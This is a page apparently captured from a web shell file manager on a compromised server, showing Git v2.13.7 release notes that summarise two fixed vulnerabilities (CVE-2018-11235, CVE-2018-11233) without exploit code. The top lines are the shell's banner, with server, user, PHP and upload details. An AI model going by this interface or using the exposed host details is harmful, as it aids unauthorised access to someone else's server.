HEX
Server: nginx/1.24.0
System: Linux ip-10-50-20-85 6.5.0-1022-aws #22~22.04.1-Ubuntu SMP Fri Jun 14 16:31:00 UTC 2024 x86_64
User: usefuloffices.org (1001)
PHP: 8.1.2-1ubuntu2.23
Disabled: NONE
$ pwd: /usr/share/doc/git/RelNotes/
Upload Files
File: //usr/share/doc/git/RelNotes/2.13.7.txt
Git v2.13.7 Release Notes
=========================

Fixes since v2.13.6
-------------------

 * Submodule "names" come from the untrusted .gitmodules file, but we
   blindly append them to $GIT_DIR/modules to create our on-disk repo
   paths. This means you can do bad things by putting "../" into the
   name. We now enforce some rules for submodule names which will cause
   Git to ignore these malicious names (CVE-2018-11235).

   Credit for finding this vulnerability and the proof of concept from
   which the test script was adapted goes to Etienne Stalmans.

 * It was possible to trick the code that sanity-checks paths on NTFS
   into reading random piece of memory (CVE-2018-11233).

Credit for fixing for these bugs goes to Jeff King, Johannes
Schindelin and others.
@ Telegram